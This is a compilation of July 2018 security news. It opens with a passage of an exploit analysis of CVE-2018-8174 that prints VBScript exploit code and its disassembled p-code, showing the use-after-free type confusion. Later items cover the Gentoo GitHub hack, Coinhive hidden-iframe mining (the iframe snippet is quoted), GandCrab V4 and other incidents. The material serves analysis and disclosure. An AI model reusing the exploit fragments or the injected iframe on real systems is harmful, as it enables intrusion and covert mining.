For IIIl=0 To 6
IIIlI(IIIl)=0
Next
Set llII=New Class2
llII.mem=lIlIIl
For IIIl=0 To 6
Set IIIlI(IIIl)=llII
Next
End Property
End Class

Function 30 (‘p’) [max stack = 3]:
arg count = 0
lcl count = 1
lcl 1 = Variant ‘llII’
tmp count = 4
Pcode:
***BOS(8626,8656)*** P=CDbl(“174088534690791e-324”) *****
0000 OP_Bos1 0
0002 OP_StrConst ‘174088534690791e-324’
0007 OP_CallNmdAdr ‘CDbl’ 1
000E OP_LocalSt 0
***BOS(8763,8782)*** For IIIl=(0) To (6) *****
0011 OP_Bos1 1
0013 OP_IntConst 0
0015 OP_IntConst 6
0017 OP_IntConst 1
0019 OP_ForInitNamed ‘IIIl’ 5 4
0022 OP_JccFalse 0047
***BOS(8809,8824)*** IIIlI(IIIl)=(0) *****
0027 OP_Bos1 2
0029 OP_IntConst 0
002B OP_NamedAdr ‘IIIl’
0030 OP_CallNmdSt ‘IIIlI’ 1
***BOS(8826,8830)*** Next *****
0037 OP_Bos1 3
0039 OP_ForNextNamed ‘IIIl’ 5 4
0042 OP_JccTrue 0027
***BOS(8855,8874)*** Set llII=New Class2 *****
0047 OP_Bos1 4
0049 OP_InitClass ‘Class2’
004E OP_LocalSet 1
***BOS(8876,8891)*** llII.mem=lIlIIl *****
0051 OP_Bos1 5
0053 OP_NamedAdr ‘lIlIIl’
0058 OP_LocalAdr 1
005B OP_MemSt ‘mem’
….
 

Function 30 (‘p’) [max stack = 3]:
arg count = 0
lcl count = 1
lcl 1 = Variant ‘llII’
tmp count = 4
Pcode:
***BOS(8626,8656)*** P=CDbl(“174088534690791e-324”) *****
0000 OP_Bos1 0
0002 OP_StrConst ‘174088534690791e-324’
0007 OP_CallNmdAdr ‘CDbl’ 1
000E OP_LocalSt 0
***BOS(8763,8782)*** For IIIl=(0) To (6) *****
0011 OP_Bos1 1
0013 OP_IntConst 0
0015 OP_IntConst 6
0017 OP_IntConst 1
0019 OP_ForInitNamed ‘IIIl’ 5 4
0022 OP_JccFalse 0047
***BOS(8809,8824)*** IIIlI(IIIl)=(0) *****
0027 OP_Bos1 2
0029 OP_IntConst 0
002B OP_NamedAdr ‘IIIl’
0030 OP_CallNmdSt ‘IIIlI’ 1
***BOS(8826,8830)*** Next *****
0037 OP_Bos1 3
0039 OP_ForNextNamed ‘IIIl’ 5 4
0042 OP_JccTrue 0027
***BOS(8855,8874)*** Set llII=New Class2 *****
0047 OP_Bos1 4
0049 OP_InitClass ‘Class2’
004E OP_LocalSet 1
***BOS(8876,8891)*** llII.mem=lIlIIl *****
0051 OP_Bos1 5
0053 OP_NamedAdr ‘lIlIIl’
0058 OP_LocalAdr 1
005B OP_MemSt ‘mem’
….
The first basic block of this function is:

***BOS(8626,8656)*** P=CDbl(“174088534690791e-324”) *****
0000OP_Bos1 0
0002OP_StrConst ‘174088534690791e-324’
0007OP_CallNmdAdr’CDbl’ 1
000EOP_LocalSt 0

This block converts the string ‘174088534690791e-324’ to VARIANT and stores it in the local variable 0, reserved for the return value of the function.

VARIANT obtained after converting ‘174088534690791e-324’ to double

After the return value is set but before it is returned, this function performs:

For IIIl=0 To 6
IIIlI(IIIl)=0
Next

This calls the garbage collector for the ‘Class1’ instance and results in a dangling pointer reference due to the use-after-free vulnerability in Class_Terminate() that we discussed earlier.

In the line

***BOS(8855,8874)*** Set llII=New Class2 *****
0047OP_Bos1 4
0049OP_InitClass ‘Class2’
004EOP_LocalSet 1

the OP_InitClass ‘Class2’ instruction creates an “evil twin” instance of class ‘Class1’ at the location of the previously freed VBScriptClass, which is still referenced by the OP_NamedSt ‘mem’ instruction in function 36 (‘SetProp’).

Class ‘Class2’ is the “evil twin” of class ‘Class1’:

Class Class2
Dim mem
Function P0123456789
P0123456789=LenB(mem(IlII+(8)))
End Function
Function SPP
End Function
End Class
 

Class Class2
Dim mem
Function P0123456789
P0123456789=LenB(mem(IlII+(8)))
End Function
Function SPP
End Function
End Class

Function 31 (‘Class2’) [max stack = 1]:
arg count = 0
lcl count = 0
Pcode:
0000 OP_CreateClass ‘Class2’
0005 OP_FnBindEx ‘P0123456789’ 32 FALSE
000F OP_FnBindEx ‘SPP’ 33 FALSE
0019 OP_CreateVar ‘mem’ FALSE
001F OP_LocalSet 0
0022 OP_FnReturn
Function 32 (‘P0123456789’) [max stack = 2]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8390,8421)*** P0123456789=LenB(mem(IlII+(8))) *****
0000 OP_Bos1 0
0002 OP_NamedAdr ‘IlII’
0007 OP_IntConst 8
0009 OP_Add
000A OP_CallNmdAdr ‘mem’ 1
0011 OP_CallNmdAdr ‘LenB’ 1
0018 OP_LocalSt 0
***BOS(8423,8435)*** End Function *****
001B OP_Bos1 1
001D OP_FnReturn
001E OP_Bos0
001F OP_FuncEnd
Function 33 (‘SPP’) [max stack = 0]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8451,8463)*** End Function *****
0000 OP_Bos1 0
0002 OP_FnReturn
0003 OP_Bos0
0004 OP_FuncEnd
 

Function 31 (‘Class2’) [max stack = 1]:
arg count = 0
lcl count = 0
Pcode:
0000 OP_CreateClass ‘Class2’
0005 OP_FnBindEx ‘P0123456789’ 32 FALSE
000F OP_FnBindEx ‘SPP’ 33 FALSE
0019 OP_CreateVar ‘mem’ FALSE
001F OP_LocalSet 0
0022 OP_FnReturn
Function 32 (‘P0123456789’) [max stack = 2]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8390,8421)*** P0123456789=LenB(mem(IlII+(8))) *****
0000 OP_Bos1 0
0002 OP_NamedAdr ‘IlII’
0007 OP_IntConst 8
0009 OP_Add
000A OP_CallNmdAdr ‘mem’ 1
0011 OP_CallNmdAdr ‘LenB’ 1
0018 OP_LocalSt 0
***BOS(8423,8435)*** End Function *****
001B OP_Bos1 1
001D OP_FnReturn
001E OP_Bos0
001F OP_FuncEnd
Function 33 (‘SPP’) [max stack = 0]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8451,8463)*** End Function *****
0000 OP_Bos1 0
0002 OP_FnReturn
0003 OP_Bos0
0004 OP_FuncEnd
The location of variables in memory is predictable. The amount of data occupied by the VVAL structure is calculated using the formula 0x32 + the length of the variable name in UTF-16.

Below is a diagram that shows the location of ‘Class1’ variables relative to ‘Class2’ variables when ‘Class2’ is allocated in place of ‘Class1’.

When execution of the OP_NamedSt ‘mem’ instruction in function 36 (‘SetProp’) is complete, the value returned by function 30 (‘p’) is written to memory through the dangling pointer of VVAL ‘mem’ in Class1, overwriting the VARIANT type of VVAL ‘mem’ in Class2.

VARIANT of type Double overwrites the VARIANT type from String to Array

Thus, an object of type String is converted to an object of type Array, and data that was previously considered to be a string is treated as an Array control structure, allowing access to be gained to the entire address space of the process.

Conclusion
Our scripts for disassembling VBScript compiled into p-code enable VBScript debugging at the bytecode level, which helps to analyze exploits and understand how VBScript operates. They are available in our Github repository

The case of CVE-2018-8174 demonstrates that when memory allocations are highly predictable, use-after-free vulnerabilities are easy to exploit. The in-the-wild exploit targets older versions of Windows. The location of objects in memory required for its exploitation is most likely to occur in Windows 7 and Windows 8.1.

Automatic Exploit Protection (AEP), part of Kaspersky Lab products, blocks all stages of the exploit with the following verdicts:

HEUR:Exploit.MSOffice.Generic
HEUR:Exploit.Script.CVE-2018-8174.a
HEUR:Exploit.Script.Generic
HEUR:Trojan.Win32.Generic
PDM:Exploit.Win32.Generic


Gentoo Publishes Incident Report After GitHub Hack

5.7.2018 securityweek Hacking

Gentoo GitHub account hacked

Maintainers of the Gentoo Linux distribution published an incident report on Wednesday after someone hijacked one of the organization’s GitHub accounts and planted malicious code.

The attack started on June 28 and the hacker (or hackers) not only changed content in compromised repositories, but also locked out Gentoo developers from the targeted GitHub account. This made the attack “loud” – Gentoo believes the hackers could have maintained access longer had they been quieter.

GitHub could not be used by Gentoo for a total of five days as a result of the incident. The breach also led to a disruption of the Gentoo Proxy Maintainers Project as it uses GitHub to submit pull requests, and all past pull requests were disconnected from their original commits.

The attacker also attempted to wipe users’ files by adding “rm-rf” to some repositories, but Gentoo believes this method was unlikely to work due to “various technical guards.”

The GitHub account was compromised after the hacker gained access to an admin account that had a predictable password.

“Evidence collected suggests a password scheme where disclosure on one site made it easy to guess passwords for unrelated webpages,” Gentoo wrote in its incident report.

The incident report summarizes the lessons learned by Gentoo following the incident and the actions taken or planned in response. These actions include making frequent backups, requiring the use of two-factor authentication (2FA) and introducing support for hardware-based 2FA, reducing the number of users with elevated privileges, auditing logins, publishing password policies, and suggesting the use of password managers.

Gentoo is also working on an incident response plan, particularly for sharing information about a security incident with users.

The maintainers of the Linux distribution believe the breach has been contained and restored the impacted GitHub page.


Facebook Responding to US Regulators in Data Breach Probe

5.7.2018 securityweek  Social

Facebook acknowledged Tuesday it was facing multiple inquiries from US and British regulators about the major Cambridge Analytica user data scandal.

The leading social network offered no details but its admission confirmed reports of a widening investigation into the misuse of private data by Facebook and its partners.

"We are cooperating with officials in the US, UK and beyond," a Facebook spokesman said in response to an AFP query.

"We've provided public testimony, answered questions, and pledged to continue our assistance as their work continues."

The Washington Post reported that the Securities and Exchange Commission, Federal Trade Commission and FBI as well as the Justice Department are looking into the massive breach of users' personal data and how the company handled it.

Facebook shares closed the shortened Nasdaq trading day down 2.35 percent to $192.73, heading into an Independence Day holiday with investors mulling what effect the investigations may have on the California-based internet giant.

Facebook has admitted that up to 87 million users may have had their data hijacked by British consultancy Cambridge Analytica, which worked for US President Donald Trump during his 2016 campaign.

Facebook chief Mark Zuckerberg apologized to the European Parliament in May and said the social media giant is taking steps to prevent such a breach from happening again.

Zuckerberg said at a hearing in Brussels that it became clear in the last two years that Facebook executives didn't do enough to prevent the platform "from being used for harm."

Zuckerberg was grilled about the breach in US Congress in April.

It remains unclear what if any penalties Facebook may face from the latest requests but the tech giant is legally bound to comply with a 2011 consent decree with the FTC on protecting private user data.

Any SEC inquiry could look at whether Facebook adequately disclosed key information to investors.


Why Banning Risks to Cybersecurity Doesn’t Actually Improve Cybersecurity

5.7.2018 securityaffairs Cyber

There’s a prevailing mindset that suggests if organizations ban all the things that pose risks to overall cybersecurity, they’re taking the most effective approach to make their organizations secure.
Initially, that line of thinking seems sensible in some regards. After all, if the aspects that threaten cybersecurity aren’t allowed at all, the problems they pose could never crop up.

But, that belief is far too simplistic. Other interventions must occur to make cybersecurity a priority, whether it’s for specific websites or entire establishments.

1. Bans Could Limit or Prevent Access to Technology
Officials associated with the U.S. government are aiming to block Huawei components from entering the country’s marketplace if they’re used on communications equipment. The argument is that those parts compromise the nation’s security.

But, it’s a short-sighted approach since all the nation’s telecommunications providers already depend on equipment from Chinese manufacturers. Instituting a ban on goods for Huawei could prevent companies from getting federal funding that increases access to technology in communities with limited internet access.

Moreover, the economical prices associated with Huawei equipment make the items fit the budgets of small carriers that cannot afford pricier goods. If telecommunications providers no longer have the option to buy and use Huawei merchandise, the households and businesses in rural areas may have no means for getting internet access.

Instead of focusing on individual companies and prohibiting those from selling goods to companies in the U.S., it’s preferable for the country to develop a comprehensive national security strategy that’s not brand dependent.

2. Existing Cybersecurity Plans Generally Fall Short
A report from the U.S. State Department warned that it’s still easy to find cybersecurity vulnerabilities at public and private organizations despite increased investments meant to protect the respective networks.

A plan that only involves banning specific software titles or manufacturers isn’t robust enough because it’s not all-encompassing. Instead, organizations need to carry out intensive security audits and identify all the weak points in the networks and proactively try to minimize them.

In many cases, they can do this by implementing some of the most promising technological strategies. For example, context-based authentication and authorization use analytic data to calculate a risk score that determines whether to grant, deny or challenge a person’s access attempts.

Plus, if organizations attempt to ban software on workplace computers, that step might not be sufficient because so many people use mobile devices and apps to access workplace content from home, and their employers likely don’t know it’s happening.

3. Risks Are Not Always Apparent
It could take weeks or even months before organizations realize certain kinds of software may be detrimental to their overall cybersecurity strategies. That’s especially true because such findings are often discovered by diligent independent researchers who sound the alarm for the benefit of the public.

The Amazon Echo is one example of a gadget with software that’s had some gaping holes. In one instance, researchers illuminated an issue that could allow hackers to listen to, transcribe and transmit things people said after they used an Alexa skill that seemed legitimate.

Amazon quickly responded to the incident and fixed the problem. However, this case study proves it’s not always possible to tell whether software is risky or safe. People use Alexa daily without problems, but that doesn’t mean the software is trouble-free, nor that companies should rush to ban it.

If companies are too quick to disallow some kinds of software, they could prevent employees from accessing things at their workplaces that are genuinely helpful. In short, there is not a straightforward, fail-safe method for determining if a piece of software is safe or problematic. Even the most well-built software can have shortcomings.

4. We’re Living in a Global Economy
Wayne Jones, the chief information officer at the National Nuclear Security Administration, points out that instead of enforcing bans, the better approach to take is to figure out how to use software in ways that protect a company’s information.

He also brought up how we’re all living in a global economy, and that’s another reason why software bans don’t have the intended effect of bolstering cybersecurity.

The people who develop software and work on other tech-related projects often originate from foreign nations.

If the U.S. made a federal decision not to use equipment made by Huawei, would that ruling eventually progress to prevent anyone with past ties to the company from working for a United States business, then bar people from certain nations from taking tech-related jobs in the U.S?

If so, the United States could find its tech development efforts substantially hindered, not to mention spend a significant amount of time determining which equipment features parts manufactured by countries on a theoretical “banned” list.

A Proactive Stance Is Essential
One thing people must remember is that cybercriminals tend to find ways to infiltrate systems even when doing so means overcoming obstacles. That means an outright ban on software — or anything else that might compromise cybersecurity — isn’t advisable.

Instead, organizations of all sizes must show proactiveness and learn to monitor for threats, counteract infiltration attempts and tighten their infrastructures when necessary.

Cybersecurity


Adware already infected at least 78000 Fortnite Players
5.7.2018 securityaffairs
Virus

Rainway reported that tens of thousands of Fortnite players have been infected with an adware while downloading fake v-buck generators
Fortnite continues to be one of the most popular game and crooks are attempting to target millions of fans in different ways.

In June, experts observed cyber criminals attempting to exploit the interest in forthcoming Fortnite Android to infect millions of fans.

Not only users interested in the Android version of the popular game are the target of cyber criminals, crooks are now targeting gamers searching for Fortnite v-bucks generator.

v-buck is the in-game currency can be spent in both the Battle Royale PvP mode and the Save the World PvE campaign, in the former to purchase new customization items while in the latter to purchase Llama Pinata card packs.

Clearly many gamers search for v-buck generators, but these applications may hide dangerous malware.

Fortnite v-bucks

Researchers at the Web-based game-streaming platform Rainway reported that tens of thousands of Fortnite players have already attempted to download the fake generators with the result of infecting their systems.

The malicious code associated with this campaign is a strain of malware that hijacks encrypted HTTPS web sessions to inject fraudulent ads into every website they visit.

“On the early morning of June 26th, we began receiving hundreds of thousands of error reports to our tracker. Not feeling very excited to see such an influx of events on a Tuesday the engineering team was a bit flustered, after all, we hadn’t released any updates to that particular piece of our solution.” reads the blog post published by Rainway CEO Andrew Sampson.
The experts at Rainway started the investigation after they were noticing hundreds of thousands of error reports from server logs. The internal staff discovered that the systems of their users were attempting to connect with various ad platforms.

Since Rainway system only allows to load content from whitelisted domains, all the requests discovered by the company attempted to download ads from other domains and for this reason they were triggering connection errors.

Rainway experts analyzed hundreds of Fortnite exploit software searching for the ones that were generating the same errors reported by Rainway users.

Rainway discovered that the errors were generated by systems that were infected with a fake V-Bucks generator.

Searching online it is quite easy to find any kind of software that poses as a Fortnite hack tool, these applications are advertised through YouTube videos and claim to allow players to generate free V-Bucks, in addition to a classic aimbot.

Fortnite v-buck

Once the malicious code has infected the player’s system, it will immediately install a root certificate and configure the Windows machine to act as a proxy for the web traffic.

This specific campaign was delivering adware that alters the pages of a web request to inject ads.

Fortnite v-buck
The Rainway team was able to identify the server hosting the malware, they were compromised by attackers that were abusing them. The experts informed the company operating the compromised servers quickly removed the malware.

“Now, the adware began altering the pages of all web request to add in tags for Adtelligent and voila, we’ve found the source of the problem — now what?”

“We began by sending an abuse report to the file host, and the download was removed promptly, this was after accumulating over 78,000 downloads. We also reached out to Adtelligent to report the keys linked to the URLs. We have not received a response at this time. SpringServe quickly worked with us to identify the abusive creatives and remove them from their platform.” continues Rainway.

Rainway is warning gamers to not to install hack tools or game cheats.

Given Fortnite’s popularity, we can imagine that many other cases will emerge in the forthcoming weeks.


Crooks leverage obfuscated Coinhive shortlink in a large crypto-mining operation
5.7.2018 securityaffairs Cryptocurrency

Crooks leverage an alternative scheme to mine cryptocurrencies, they don’t inject the CoinHive JavaScript miner directly into compromised websites.
Security researchers at MalwareLabs have uncovered a new crypto mining campaign that leverages an alternative scheme to mine cryptocurrencies, differently from other campaigns, crooks don’t inject the CoinHive JavaScript miner directly in compromised websites.

CoinHive also provides an “URL shortener” service that allows users to create a short link for any URL with, the unique difference with similar services is that it introduces a delay so that it can mine Monero cryptocurrency for an interval of time before redirecting the user to the original URL.

The redirection time is adjustable via Coinhive’s settings, this means that the attackers can force visitors’ web browsers to mine cryptocurrency for a longer period.

The experts at Malwarebytes discovered a large number of legitimate websites have been hacked by crooks to load short URLs generated using the CoinHive service through a hidden HTML iFrame. With this trick, attackers aim at forcing visitors’ browsers into mining cryptocurrencies.

“We detected hundreds of new domains, all legitimate websites that were injected with a blurb of hexadecimal code. Once decoded, it shows as an invisible iframe (1×1 pixel) to cnhv[.]co/3h2b2. We believe it is part of the same campaign that was exposed by the folks over at Sucuri at the end of May.” reads the analysis published by Malwarebytes.

"<i frame src="https://cnhv[.]co/3h2b2" width="1" height="1" align="left"></i frame>"
CoinHive JavaScript miner

“The cnhv[.]co domain name is used for what Coinhive calls shortlinks, essentially a way of monetizing on hyperlinks by making visitors’ browsers solve a certain number of hashes before they reach their destination site. When clicking on such a link, you will see a progress bar and within a few seconds, you will be redirected. Crooks are abusing this feature by loading those shortlinks as hidden iframes with an unreasonably high hash count.”

This mining scheme is a novelty in the threat landscape because it doesn’t leverage on the injection of CoinHive’s JavaScript in the compromised websites.

Malwarebytes experts linked this last campaign to the one monitored by Sucuri researchers in May.

The attackers add an obfuscated javascript code into the compromised websites, this code is used to dynamically injects an invisible iframe (1×1 pixel) into the webpage as soon as it is loaded on the web browser.

The webpage then automatically starts mining until the Coinhive short-link service redirects the user to the original URL.

coinhive script 2.png

“In Figure 3 where we made the iframe visible by changing its dimensions, to show that rather than wait for a few seconds before being redirected, users will unknowingly be mining for as long as they stay on the page.” continues the analysis from Malwarebytes.
“Indeed, while Coinhive’s default setting is set to 1024 hashes, this one requires 3,712,000 before loading the destination URL.”
Experts also discovered that cybercriminals are injecting hyperlinks to other compromised websites to trick victims into downloading cryptocurrency miners for desktops that are disguised as legitimate software.

“In this campaign, we see infrastructure used to push an XMRig miner onto users by tricking them into downloading files they were searching for online,” continues the researchers.

“In the meantime, hacked servers are instructed to download and run a Linux miner, generating profits for the perpetrators but incurring costs for their owners.”

Further technical details about the campaign, including the IoCs, are reported in the blog post.


The GandCrab ransomware V4 appears in the threat landscape
4.7.2018 securityaffairs
Ransomware

A new variant of the infamous GandCrab ransomware V4 was released during the weekend, experts shared details of the threat,
A new version of the dreaded GandCrab ransomware (V4) was released during the weekend and according to the experts it included numerous changes.

Fly
@china591
New #GandCrab version "V4" GANDCRAB V4 Ransomware – Remove and Restore .KRAB Encrypted Files

Fly
@china591
Replying to @malwrhunterteam and 2 others
https://www.virustotal.com/#/file/ef7b107c93e6d605a618fee82d5aeb2b32e3265999f332f624920911aabe1f23/detection …https://app.any.run/tasks/daa35edf-94dc-416b-a7b1-fd45b6900c43 …

MD597a910c50171124f2cd8cfc7a4f2fa4f
SHA-13737d782cb64fa92d2c42f3c2857ee2295dc8aa4
Authentihashd64152842b2b787a86bb5dd2084ae40efd9914df8a880eb242f67ce5447a46f6

10:29 AM - Jul 3, 2018
See Fly's other Tweets
Twitter Ads info and privacy
The GandCrab ransomware V4 uses different encryption algorithms (likely the Salsa20 stream cipher) and a new TOR payment site (gandcrabmfe6mnef.onion), it appends the “.KRAB” extension to the encrypted file’s names and use a new ransom note name.

GandCrab ransomware V4

Marcelo Rivero
@MarceloRivero
· 3 Jul
#GandCrab #v4 🦀🆕
[+] Extension: ".KRAB"
[+] Internal version: 4.0
[+] Note: KRAB-DECRYPT.txt
[+] Tor: gandcrabmfe6mnef[.]onion
[-] No more wallpaper routine and no C2C.https://beta.virusbay.io/sample/browse/97a910c50171124f2cd8cfc7a4f2fa4f … pic.twitter.com/dvw604AKBG

Marcelo Rivero
@MarceloRivero
#GandCrab V4 internal version: 4.0 - seems to use now #Salsa20 stream cipher 🧐 pic.twitter.com/Op01bBC50g

4:42 AM - Jul 3, 2018
View image on Twitter
12
See Marcelo Rivero's other Tweets
Twitter Ads info and privacy
The GandCrab authors left a message in the code for the computer science professor at the University of Illinois at Chicago Daniel J. Bernstein who created the Salsa20 algorithm.

@hashbreaker Daniel J. Bernstein let's dance salsa <3
According to a malware researcher Fly, the GandCrab ransomware V4 is currently being distributed through fake software crack sites.

“The ransomware distributors will hack legitimate sites and setup fake blogs that offer software crack downloads. When a user downloads and runs these cracks, they will install the GandCrab Ransomware onto the computer.” wrote Lawrence Abrams from Bleeping Computer.

Like previous variants, when GandCrab ransomware V4 is executed it will scan the computer and network shares for files to encrypt.

Lawrence added that this variant enumerates all shares on the network and not just mapped drives. Once encrypted files, the ransomware will create ransom notes named KRAB-DECRYPT.txt that includes payment instructions. The ransom amount is currently $1,200 USD worth of DASH (DSH) cryptocurrency.

GandCrab ransomware V4

The TOR payment site includes a support section where victims can send messages to the developers and request to decrypt one file for free as the proof of their abilities.

The bad news is that, at this time, victims of GandCrab ransomware v4 cannot decrypt their files for free.


Rowhammer Evolves into RAMpage Exploit, Targeting Android Phones Since 2012
4.7.2018 securityaffairs Android

rThis week researchers demonstrated that most Android phones released since 2012 are still vulnerable to the RAMpage attack.
In 2012, security researchers identified a bug in modern DRAM (dynamic random access memory) chips that could lead to memory corruption.

In 2015, Google Project Zero researchers demonstrated “rowhammer“, a working exploit of this attack providing privilege escalation on vulnerable Linux and Windows systems. In 2016, researchers at VUSec published Drammer, demonstrating that the rowhammer technique could be used to gain root on Android devices. Google scrambled to fix the vulnerability in 2016, but this week researchers demonstrated that those fixes are incomplete and most Android phones released since 2012 are still vulnerable to the latest iteration of the attack, known as RAMpage. Since this is a hardware vulnerability, it is very difficult to retroactively “fix.”

The problem results from memory chips that leverage very small internal data paths to maximize “speed.” We may want to ensure that computer memory is free from corruption and consistent, the physics involved at the tiny memory scale have unintended consequences.

As written in the original academic paper, “[…] as DRAM process technology scales down to smaller dimensions, it becomes more difficult to prevent DRAM cells from electrically interacting with each other. […] By reading from the same row in DRAM, we show that it is possible to corrupt data in nearby addresses.” Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors, (Yoongu Kim, Ross Daly, Jeremie Kim, Chris Fallin, Ji Hye Lee, Donghyuk Lee, Chris Wilkerson, Konrad Lai, Onur Mutlu.) In other words, by repeatedly and quickly reading memory contents in DRAM Row 2, it may be possible to cause individual bits in Rows 1 or 3 to change from a 1 to a 0 or vice versa.

An interesting physical outcome and concerning, but it wasn’t until Google Zero Project researchers published a working exploit in 2015 that the risks became significant.

RAMpage_Android_Rowhammer

In the 2015 blog post, “Exploiting the DRAM rowhammer bug to gain kernel privileges”, Google security researchers explained that by using the rowhammer technique on two rows simultaneously (double-sided hammering), they were able to induce bit flips on a DRAM memory location between the two rows being read. Corrupting memory with electrical interference is a neat trick, but being able to change the memory bits to your choice is the start of a practical exploit and the researchers demonstrated an ability to gain privilege escalation on Windows and Linux systems. With privilege escalation, it may be possible to execute any malicious code on the target system. There are mitigations available to reduce the risks from rowhammer, but they require changes to hardware and some result in increased power consumption and reduced performance. Perhaps acceptable in desktop and server environments where security concerns override power consumption, but power is a prime concern in mobile devices — which were first shown to be vulnerable to rowhammer attacks in 2016.

Security researchers from VUSec in Amsterdam published a blog posti n 2016 titled, “Drammer: Flip Feng Shui Goes Mobile.” In this post, they described how a rowhammer attack could be used against mobile devices running Android OS to gain “root access” to the devices. The attack can be launched “by hiding it in a malicious app that requires no permissions.” Once the attacker has root access, they have full control of your mobile device and the information on that device. A patch for the Android kernel ION subsystem was released in November of 2016 which addresses the Drammer attack. Unfortunately, the Android environments still suffer from fragmentation and distribution challenges so you can expect that many vulnerable devices have not yet received this patch. Of course, as we learned this week, even if you did receive the patch, you may still be vulnerable.

An international team of system security researchers published the paper, “GuardION: Practical Mitigation of DMA-based Rowhammer Attacks on ARM” which describes an evolution of the rowhammer attack into the attack they dub, RAMPAGE. From the paper, RAMPAGE is described as, “a set of DMA-based Rowhammer attacks
against the latest Android OS, consisting of (1) a root exploit, and (2) a series of app-to-app exploit scenarios that bypass all defenses.” Acknowledging that the patch released in 2016 did address the “double-sided hammer” vulnerability, these researchers determined that combining an attack that consumes all ION internal memory pools with their Flip Feng Shui exploit they were still able to gain root on the target Android device. As always, once the bad actors have root, they have access to everything on your phone.

Since the theoretical proposal in 2012, we have seen the same memory vulnerability exploited repeatedly with greater impact and relative ease. In the RAMpage researchers’ own words, “Over the last two years, the Rowhammer bug transformed from a hard-to-exploit DRAM disturbance error into a fully weaponized attack vector.” Being hardware-based, memory attacks like these are notoriously difficult to defend against. And if there is a viable defence, it usually increases costs or reduces performance making it less likely to be deployed We have to recognize that mobile devices are as capable as desktop computers and accept that they require similar protections, vulnerability management procedures and upgrades.

Do you consider your ability to patch and protect mobile systems when purchasing?


Siemens warns of several flaws affecting Central Plant Clocks
4.7.2018 securityaffairs ICS

Siemens disclosed several vulnerabilities in some of its SICLOCK central plant clocks, including ones that have been rated as “critical.”
Siemens is warning of the presence of six vulnerabilities in some of its SICLOCK central plant clocks that used to synchronize time in industrial environments.

“In the event of failure or loss of reception from the primary time source, the central plant clock ensures stable continuation of the clock time, and tracking of the system time without time jumps as soon as reception is restored.” reads the Siemens official website.

The vulnerabilities have been assigned the CVE identifiers CVE-2018-4851 through CVE-2018-4856, three of them have been classified as critical.

“SICLOCK TC devices are affected by multiple vulnerabilities that could allow an attacker to cause Denial-of-Service conditions, bypass the authentication, and modify the firmware of the device or the administrative client.” reads the security advisory.

One of the critical vulnerabilities tracked as CVE-2018-4851 could be exploited by attackers with access to the network to cause the targeted device to enter a denial-of-service (DoS) condition and potentially reboot by sending it specially crafted packets.

The successful exploitation of this flaw doesn’t require user interaction.

“An attacker with network access to the device, could cause a Denial-of-Service condition by sending certain packets to the device, causing potential reboots of the device.” reads the security advisory.

“The core functionality of the device could be impacted. The time serving functionality recovers when time synchronization with GPS devices or other NTP servers are completed. The vulnerability could impact the availability of the device, and could impact the integrity of the time service functionality of the device.”

The second critical vulnerability, tracked as CVE-2018-4853, can be exploited by an attacker with access to UDP port 69 to modify the firmware on a vulnerable device.

The flaw could be exploited by an attacker to run his own code on the SICLOCK device.

Siemens Central Plant Clocks siclock

The third critical issue tracked as CVE-2018-4854 can be exploited by an attacker with access to UDP port 69 to modify the administrative client stored on the device.

“An attacker with network access to port 69/udp could modify the administrative client stored on the device.” continues the advisory.

“If a legitimate user downloads and executes the modified client from the affected device, then he could obtain code execution on the client system.”

Siemens also reported a high severity vulnerability that could be exploited by a network attacker to bypass authentication.

The other issues discovered by Siemens are a medium severity flaw that could be exploited to launch a man-in-the-middle (MitM) attack and intercept unencrypted passwords stored in client configuration files, and a low severity flaw that can be exploited by an attacker with admin access to the management interface to lock out legitimate users.

Siemens says it’s not aware of any instances where these flaws have been exploited for malicious purposes.

The flaws impacted the SICLOCK TC100 and SICLOCK TC400.

Siemens did not release firmware updates for the products because they are in phase out, the industrial giant only provided workarounds and mitigations to mitigate the risk of attacks.


Huawei enterprise and broadcast products have a crypto bug. Fix it now!
4.7.2018 securityaffairs
Vulnerebility

Huawei has rolled out security fixes for some enterprise and broadcast products to address a cryptography issue tracked as CVE-2017-17174.
Huawei has released security updates for some enterprise and broadcast products to address a cryptography issue that was discovered in late 2017.

The vulnerability, tracked as CVE-2017-17174, is related to the implementation of an insecure encryption algorithm and could be exploited to power MiTM attack to decrypt a session key and recover the content of the entire session.

“There is a weak algorithm vulnerability in some Huawei products. A remote, unauthenticated attacker may capture traffic between clients and the affected products.” reads the security advisory published by Huawei.

“Due to the use of insecure encryption algorithm, the attacker may decrypt the session key by some cryptanalytic operations and the traffic between the server and the client. Successful exploit may cause information leak.”

The following Huawei products using RSA encryption in TLS are potentially vulnerable:

The RSE6500 Recording and Streaming Engine version V500R002C00. A high-performance, full-HD recording and streaming engine that supports live video multicast and mobile Video on Demand (VoD).
The SoftCo unified communications software version V200R003C20SPCb00;
The VP9660 video conferencing multipoint control units version V600R006C10;
Multiple versions of its eSpace U1981 IP telephony and enterprise communications universal SIP gateway.
Huawei

Huawei rated the vulnerability as a 5.3 (medium) because it is not easy to exploit, the company has released software updates to address the flaw for all of its solution except for the unified communications software SoftCo that has been deprecated.

Every flaw discovered in products of Chinese and Russia firm trigger the alarm of governments that are already banning their solution from critical infrastructure and government offices.

In May, the Pentagon ordered retail outlets on US military bases to stop selling Huawei and ZTE products due to unacceptable security risk they pose.